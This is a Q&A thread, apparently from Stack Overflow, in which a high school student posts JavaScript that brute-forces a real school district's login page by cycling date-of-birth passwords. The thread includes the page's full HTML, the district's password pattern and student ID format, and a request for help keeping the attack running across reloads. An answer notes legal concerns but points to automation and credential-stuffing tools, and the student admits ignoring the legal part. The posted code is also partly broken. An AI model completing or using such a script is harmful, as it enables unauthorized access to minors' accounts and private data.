# Password cracker (Javascript) in console from browser

Tags: javascript

I am a high school student and I am trying to make a password cracker to show my school how vulnerable their Student Dashboard is. A student Dashboard is a website that contains student accounts, links, and private information like addresses, passwords, and relatives.

Everyone's password has the following syntax: Pmonth/day/year

EXAMPLE: P05/03/2005

There is a problem though, when the code clicks the sign in button, the URL changes, and the page reloads, which stops the code when I run it in the console.

Is there a way that I could keep the code running from console even if page reloads.

I have thought of using web cookies to store the last used password, and then when the page reloads, just input it into the password textbox, but I am not sure, since I haven't used cookies before.

Any help is greatly appreciated.

What I am aiming to do is that I input an Id, and then it tries to crack the password by going through all dates a year has after 2003.

I will appreciate all answers, but I would like my answer in raw javascript(no libraries).

The sign in page consists of an username textbox, a password textbox and a sign in button.

Here's what the sign in page looks like: [Sign in page](https://i.stack.imgur.com/xbSW3.png)

Here is the source code of the page:

```html
 <!DOCTYPE html>
<html lang="en-US">
    <head>
        <meta http-equiv="X-UA-Compatible" content="IE=10.000"/>
        <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"/>
        <meta http-equiv="content-type" content="text/html;charset=UTF-8" />
        <meta http-equiv="cache-control" content="no-cache,no-store"/>
        <meta http-equiv="pragma" content="no-cache"/>
        <meta http-equiv="expires" content="-1"/>
        <meta name='mswebdialog-title' content='Connecting to Broward County Public Schools'/>

        <title>Sign In</title>
        <script type='text/javascript'>
//<![CDATA[
function LoginErrors(){this.userNameFormatError = 'Enter your user ID in the format \u0026quot;domain\\user\u0026quot; or \u0026quot;user@domain\u0026quot;.'; this.passwordEmpty = 'Enter your password.'; this.passwordTooLong = 'Password must be shorter than 128 characters.';}; var maxPasswordLength = 128;
//]]>
</script>

<script type='text/javascript'>
//<![CDATA[
// Copyright (c) Microsoft Corporation.  All rights reserved.
function InputUtil(errTextElementID, errDisplayElementID) {

    if (!errTextElementID)  errTextElementID = 'errorText'; 
    if (!errDisplayElementID)  errDisplayElementID = 'error'; 

    this.hasFocus = false;
    this.errLabel = document.getElementById(errTextElementID);
    this.errDisplay = document.getElementById(errDisplayElementID);
};
InputUtil.prototype.canDisplayError = function () {
    return this.errLabel && this.errDisplay;
}
InputUtil.prototype.checkError = function () {
    if (!this.canDisplayError){
        throw new Error ('Error element not present');
    }
    if (this.errLabel && this.errLabel.innerHTML) {
        this.errDisplay.style.display = '';        
        var cause = this.errLabel.getAttribute('for');
        if (cause) {
            var causeNode = document.getElementById(cause);
            if (causeNode && causeNode.value) {
                causeNode.focus();
                this.hasFocus = true;
            }
        }
    }
    else {
        this.errDisplay.style.display = 'none';
    }
};
InputUtil.prototype.setInitialFocus = function (input) {
    if (this.hasFocus) return;
    var node = document.getElementById(input);
    if (node) {
        if ((/^\s*$/).test(node.value)) {
            node.focus();
            this.hasFocus = true;
        }
    }
};
InputUtil.prototype.setError = function (input, errorMsg) {
    if (!this.canDisplayError) {
        throw new Error('Error element not present');
    }
    input.focus();

    if (errorMsg) {
        this.errLabel.innerHTML = errorMsg;
    }
    this.errLabel.setAttribute('for', input.id);
    this.errDisplay.style.display = '';
};
InputUtil.makePlaceholder = function (input) {
    var ua = navigator.userAgent;

    if (ua != null && 
        (ua.match(/MSIE 9.0/) != null || 
         ua.match(/MSIE 8.0/) != null ||
         ua.match(/MSIE 7.0/) != null)) {
        var node = document.getElementById(input);
        if (node) {
            var placeholder = node.getAttribute("placeholder");
            if (placeholder != null && placeholder != '') {
                var label = document.createElement('input');
                label.type = "text";
                label.value = placeholder;
                label.readOnly = true;
                label.style.position = 'absolute';
                label.style.borderColor = 'transparent';
                label.className = node.className + ' hint';
                label.tabIndex = -1;
                label.onfocus = function () { this.nextSibling.focus(); };

                node.style.position = 'relative';
                node.parentNode.style.position = 'relative';
                node.parentNode.insertBefore(label, node);
                node.onkeyup = function () { InputUtil.showHint(this); };
                node.onblur = function () { InputUtil.showHint(this); };
                node.style.background = 'transparent';

                node.setAttribute("placeholder", "");
                InputUtil.showHint(node);
            }
        }
    }
};
InputUtil.focus = function (inputField) {
    var node = document.getElementById(inputField);
    if (node) node.focus();
};
InputUtil.hasClass = function(node, clsName) {
    return node.className.match(new RegExp('(\\s|^)' + clsName + '(\\s|$)'));
};
InputUtil.addClass = function(node, clsName) {
    if (!this.hasClass(node, clsName)) node.className += " " + clsName;
};
InputUtil.removeClass = function(node, clsName) {
    if (this.hasClass(node, clsName)) {
        var reg = new RegExp('(\\s|^)' + clsName + '(\\s|$)');
        node.className = node.className.replace(reg, ' ');
    }
};
InputUtil.showHint = function (node, gotFocus) {
    if (node.value && node.value != '') {
        node.previousSibling.style.display = 'none';
    }
    else {
        node.previousSibling.style.display = '';
    }
};
//]]>
</script>


        
        <link rel="stylesheet" type="text/css" href="/adfs/portal/css/style.css?id=D74D4D6943F32AE6F7F11D14D601DBB0E1A58919176EE512150366B6279AAF99" /><style>.illustrationClass {background-image:url(/adfs/portal/illustration/illustration.jpg?id=EB0C84D8C0F5E1E10127F3AD4A4C45BCDAA7AC32FFE204DACEBEAF85C61DA2F9);}</style>

    </head>
    <body dir="ltr" class="body">
    <div id="noScript" style="position:static; width:100%; height:100%; z-index:100">
        <h1>JavaScript required</h1>
        <p>JavaScript is required. This web browser does not support JavaScript or JavaScript in this web browser is not enabled.</p>
        <p>To find out if your web browser supports JavaScript or to enable JavaScript, see web browser help.</p>
    </div>
    <script type="text/javascript" language="JavaScript">
         document.getElementById("noScript").style.display = "none";
    </script>
    <div id="fullPage">
        <div id="brandingWrapper" class="float">
            <div id="branding"></div>
        </div>
        <div id="contentWrapper" class="float">
            <div id="content">
                <div id="header">
                    <img class="logoImage" src="/adfs/portal/logo/logo.png?id=4F68FA71CF303418A19ABB7297038B46FA3E25ED3754C2175A7B840EC6F97BE8" alt="Broward County Public Schools"/>
                </div>
                <div id="workArea">
                    
    <div id="authArea" class="groupMargin">
        
        
    <div id="loginArea">        
        <div id="loginMessage" class="groupMargin">Sign in with your organizational account</div>

        <form method="post" id="loginForm" autocomplete="off" novalidate="novalidate" onKeyPress="if (event && event.keyCode == 13) Login.submitLoginRequest();" action="/adfs/ls/?wctx=WsFedOwinState%3doJ9avOrRYr1UaVPxwGOAIzjfQ78zxpRhLHRmhne8M1AEjI9Y5SUSP0viJgR2iCtpjpu-gGqW73MjMkyVrK9b_N9m5JlVSyznBQxTGDsRm5WDilyumMYDi4x5qL9-To1jCTs2bXP7iiZJuHS0aLiN-jXhIHy26i4J9qpsUHbiivCUYCZQNb0m68RqVJwDU-Cqf0DW1ieuP1_sAcqk3l0nwBlRoG-cO039YHVhBOyZSbnHfZtGqJRSX7p6yt5wwRQ6Y5vz9dPJ8V7FTz6-GIZPnk4ee4A&wa=wsignin1.0&wtrealm=http%3a%2f%2fgb.browardschools.com%2fpinnacle%2fgradebook%2f" >
            <div id="error" class="fieldMargin error smallText">
                <label id="errorText" for=""></label>
            </div>

            <div id="formsAuthenticationArea">
                <div id="userNameArea">
                    <input id="userNameInput" name="UserName" type="email" value="" tabindex="1" class="text fullWidth" 
                        spellcheck="false" placeholder="someone@example.com" autocomplete="off"/>     
                </div>

                <div id="passwordArea">
                     <input id="passwordInput" name="Password" type="password" tabindex="2" class="text fullWidth" 
                        placeholder="Password" autocomplete="off"/>                                   
                </div>
                <div id="kmsiArea" style="display:none">
                    <input type="checkbox" name="Kmsi" id="kmsiInput" value="true" tabindex="3" />
                    <label for="kmsiInput">Keep me signed in</label>
                </div>
                <div id="submissionArea" class="submitMargin">
                    <span id="submitButton" class="submit" tabindex="4" 
                        onKeyPress="if (event && event.keyCode == 32) Login.submitLoginRequest();" 
                        onclick="return Login.submitLoginRequest();">Sign in</span>
                </div>
            </div>
            <input id="optionForms" type="hidden" name="AuthMethod" value="FormsAuthentication"/>
        </form>

             <div id="authOptions">
        <form id="options"  method="post" action="https://fs.browardschools.com:443/adfs/ls/?wctx=WsFedOwinState%3doJ9avOrRYr1UaVPxwGOAIzjfQ78zxpRhLHRmhne8M1AEjI9Y5SUSP0viJgR2iCtpjpu-gGqW73MjMkyVrK9b_N9m5JlVSyznBQxTGDsRm5WDilyumMYDi4x5qL9-To1jCTs2bXP7iiZJuHS0aLiN-jXhIHy26i4J9qpsUHbiivCUYCZQNb0m68RqVJwDU-Cqf0DW1ieuP1_sAcqk3l0nwBlRoG-cO039YHVhBOyZSbnHfZtGqJRSX7p6yt5wwRQ6Y5vz9dPJ8V7FTz6-GIZPnk4ee4A&wa=wsignin1.0&wtrealm=http%3a%2f%2fgb.browardschools.com%2fpinnacle%2fgradebook%2f">
            <script type="text/javascript">
                function SelectOption(option) {
                    var i = document.getElementById('optionSelection');
                    i.value = option;
                    document.forms['options'].submit();
                    return false;
                }
            </script>
            <input id="optionSelection" type="hidden" name="AuthMethod" />
            <div class='groupMargin'></div>
        </form>
      </div>

        <div id="introduction" class="groupMargin">
            <p align=center><b>REPORT CHILD ABUSE</b></p><p align=center><b>CALL 1-800-96ABUSE OR 1-800-962-2873</b></p></BR><p align=center><b>Students</b></p><p>If you are a student, your login name is your 
student number (06########). If you have forgotten your password, please contact your teacher. </p></BR><p 
align=center><b>Staff</b></p><p>If you are staff, your login name should be your staff ID (P0#######). If you have forgotten your password, 
please contact your tech.</p></BR><p align=center><b>Parents Accessing Pinnacle</b></p><p>If you are a parent of a student in grades 6-12 
and are accessing Pinnacle, please use your child’s Active Directory userid and password to login. If you are the parent of a child in 
grades 3-5, please use the <b>BCPS Mobile App</b> to view the current average grade your child has earned in each class.</p>                     
        </div>

        <script type="text/javascript">
        //<![CDATA[

            function Login() {
            }

            Login.userNameInput = 'userNameInput';
            Login.passwordInput = 'passwordInput';

            Login.initialize = function () {

                var u = new InputUtil();

                u.checkError();
                u.setInitialFocus(Login.userNameInput);
                u.setInitialFocus(Login.passwordInput);
            }();

            Login.submitLoginRequest = function () { 
                var u = new InputUtil();
                var e = new LoginErrors();

                var userName = document.getElementById(Login.userNameInput);
                var password = document.getElementById(Login.passwordInput);

                if (!userName.value || !userName.value.match('[@\\\\]')) {
                    u.setError(userName, e.userNameFormatError);
                    return false;
                }

                if (!password.value) {
                    u.setError(password, e.passwordEmpty);
                    return false;
                }

                if (password.value.length > maxPasswordLength) {
                    u.setError(password, e.passwordTooLong);
                    return false;
                }

                document.forms['loginForm'].submit();
                return false;
            };

            InputUtil.makePlaceholder(Login.userNameInput);
            InputUtil.makePlaceholder(Login.passwordInput);
        //]]>
        </script>
    </div>

    </div>

                </div>
                <div id="footerPlaceholder"></div>
            </div>
            <div id="footer">
                <div id="footerLinks" class="floatReverse">
                     <div><span id="copyright">&#169; 2013 Microsoft</span></div>
                </div>
            </div>
        </div> 
    </div>
    <script type='text/javascript'>
//<![CDATA[
// Copyright (c) Microsoft Corporation.  All rights reserved.

// This file contains several workarounds on inconsistent browser behaviors that administrators may customize.
"use strict";

// iPhone email friendly keyboard does not include "\" key, use regular keyboard instead.
// Note change input type does not work on all versions of all browsers.
if (navigator.userAgent.match(/iPhone/i) != null) {
    var emails = document.querySelectorAll("input[type='email']");
    if (emails) {
        for (var i = 0; i < emails.length; i++) {
            emails[i].type = 'text';
        }
    }
}

// In the CSS file we set the ms-viewport to be consistent with the device dimensions, 
// which is necessary for correct functionality of immersive IE. 
// However, for Windows 8 phone we need to reset the ms-viewport's dimension to its original
// values (auto), otherwise the viewport dimensions will be wrong for Windows 8 phone.
// Windows 8 phone has agent string 'IEMobile 10.0'
if (navigator.userAgent.match(/IEMobile\/10\.0/)) {
    var msViewportStyle = document.createElement("style");
    msViewportStyle.appendChild(
        document.createTextNode(
            "@-ms-viewport{width:auto!important}"
        )
    );
    msViewportStyle.appendChild(
        document.createTextNode(
            "@-ms-viewport{height:auto!important}"
        )
    );
    document.getElementsByTagName("head")[0].appendChild(msViewportStyle);
}

// If the innerWidth is defined, use it as the viewport width.
if (window.innerWidth && window.outerWidth && window.innerWidth !== window.outerWidth) {
    var viewport = document.querySelector("meta[name=viewport]");
    viewport.setAttribute('content', 'width=' + window.innerWidth + 'px; initial-scale=1.0; maximum-scale=1.0');
}

// Gets the current style of a specific property for a specific element.
function getStyle(element, styleProp) {
    var propStyle = null;

    if (element && element.currentStyle) {
        propStyle = element.currentStyle[styleProp];
    }
    else if (element && window.getComputedStyle) {
        propStyle = document.defaultView.getComputedStyle(element, null).getPropertyValue(styleProp);
    }

    return propStyle;
}

// The script below is used for downloading the illustration image 
// only when the branding is displaying. This script work together
// with the code in PageBase.cs that sets the html inline style
// containing the class 'illustrationClass' with the background image.
var computeLoadIllustration = function () {
    var branding = document.getElementById("branding");
    var brandingDisplay = getStyle(branding, "display");
    var brandingWrapperDisplay = getStyle(document.getElementById("brandingWrapper"), "display");

    if (brandingDisplay && brandingDisplay !== "none" &&
        brandingWrapperDisplay && brandingWrapperDisplay !== "none") {
        var newClass = "illustrationClass";

        if (branding.classList && branding.classList.add) {
            branding.classList.add(newClass);
        } else if (branding.className !== undefined) {
            branding.className += " " + newClass;
        }
        if (window.removeEventListener) {
            window.removeEventListener('load', computeLoadIllustration, false);
            window.removeEventListener('resize', computeLoadIllustration, false);
        }
        else if (window.detachEvent) {
            window.detachEvent('onload', computeLoadIllustration);
            window.detachEvent('onresize', computeLoadIllustration);
        }
    }
};

if (window.addEventListener) {
    window.addEventListener('resize', computeLoadIllustration, false);
    window.addEventListener('load', computeLoadIllustration, false);
}
else if (window.attachEvent) {
    window.attachEvent('onresize', computeLoadIllustration);
    window.attachEvent('onload', computeLoadIllustration);
}

if (typeof Login != 'undefined'){  
    Login.submitLoginRequest = function () {   
    var u = new InputUtil();  
    var e = new LoginErrors();  
    var userName = document.getElementById(Login.userNameInput);  
    var password = document.getElementById(Login.passwordInput);  
    if (userName.value && !userName.value.match('[@\\\\]'))   
    {  
        var userNameValue = 'browardschools\\' + userName.value;  
        document.forms['loginForm'].UserName.value = userNameValue;  
    }  

    if (!userName.value) {  
       u.setError(userName, e.userNameFormatError);  
       return false;  
    }  

    if (!password.value)   
    {  
        u.setError(password, e.passwordEmpty);  
        return false;  
    }  
    document.forms['loginForm'].submit();  
    return false;  
};  
} 

// Check whether the loginMessage element is present on this page.  
var loginMessage = document.getElementById('loginMessage');  
if (loginMessage)  
{  
       // loginMessage element is present, modify its properties.  
       loginMessage.innerHTML = 'Sign in with your Browardschools Personnel Number or Student Number';  
}



//]]>
</script>


    </body>
</html>
```

Here is my following code:

```js
//Gets id textbox
var username = document.getElementById("userNameInput");

//Gets password textbox
var password = document.getElementById("passwordInput");

//Gets button
var clickbutton = document.getElementById("submitButton");




var num1 = 1; // Month, start
var num2 = 0; // Day start
var num3 = 2003; // Year start
var id = username.value;
var passwrd = password.value;

var _DOB = "P" + "0" + num1 + "/" + num2 + "/" + num3;  //Sets up the syntax for password Pmonth/day/year



function writeInput()
{
    
    
    password.value = _DOB; // writes the _DOB value into the password textbox
        clickbutton.click(); //clicks the sign in button
    
    
        //SOTRES THE ID
        id = username.value;

        //ADDS THE NEXT DAY
        num2 += 1; // If password is incorrect.

        //RESETS DAY WHEN REACHES 31(max number a month has)
        if(num2 > 31)
        {
            num2 = 1; // resets day to 1
            num1 += 1; // adds 1 to the month count.
        }
        
        // ADDS NEXT YEAR
        if(num2 == 31 && num1 == 12) // when reaches the last day of a year, it resets month and day, but adds one to the year count.
        {
            num3 += 1;
        }
        


        //RESET MONTH
        if(num1 > 12)
        {
            num1 = 1;   
        } 
        if(num2 < 10)//Adds 0 to month and day if it is less than 10. Example: P5/5/2021 is not a correct systax, it turns to P05/05/2021. It adds the zeroes.
        {
            _DOB = "P" + "0" + num1 + "/" + "0" + num2 + "/" + num3;        
        }
        else
        {
            _DOB = "P" + "0" + num1 + "/"  + num2 + "/" + num3;     
        
        }

    //Some output
    clickbutton.onclick = console.log("SIGN IN BUTTON CLICKED");
    console.log("Password used: " + _DOB);
  }
}, 100);

    
    
 
}

setInterval(function()
{ 
    writeInput();
}, 500);
```

Comment: put the html here

Comment: You might want to consider making a [Chrome Extension](https://developer.chrome.com/docs/extensions/) or a [Firefox Extension](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions)

Comment: I don't know how, but I'll learn how in the near future.

Answer (score 0):

Your challenge is to persist your JavaScript code inside a website hosted by someone else. All code within your browsers console is obsolete after page reload.

Another challenge you are facing is a legal one. It's highly recommended to get a permission to access an online service for the purpose you described. Any kind of security assessment has to be coordinated and aligned with the organization responsible for the questioned online service.

Since you will not want to change the content of the web server for legal reasons, you would need a tool manipulate the content served by the webserver within your client (read "browser").

There are browser automation tool like [Puppeteer](https://developers.google.com/web/tools/puppeteer/) or [Selenium Webdriver](https://www.selenium.dev/) you can use to request any url repeatedly and to automate certain actions within the context of a browser like clicking elements, filling forms, executing JavaScript and so on.

Additionally there a fuzzers that can perform what is called credential stuffing. You can read more [here about Burp Suite](https://portswigger.net/burp/documentation/desktop/tools/intruder/using).

Comment: The legal part, is the one I am not following, but I am trying it with my own account.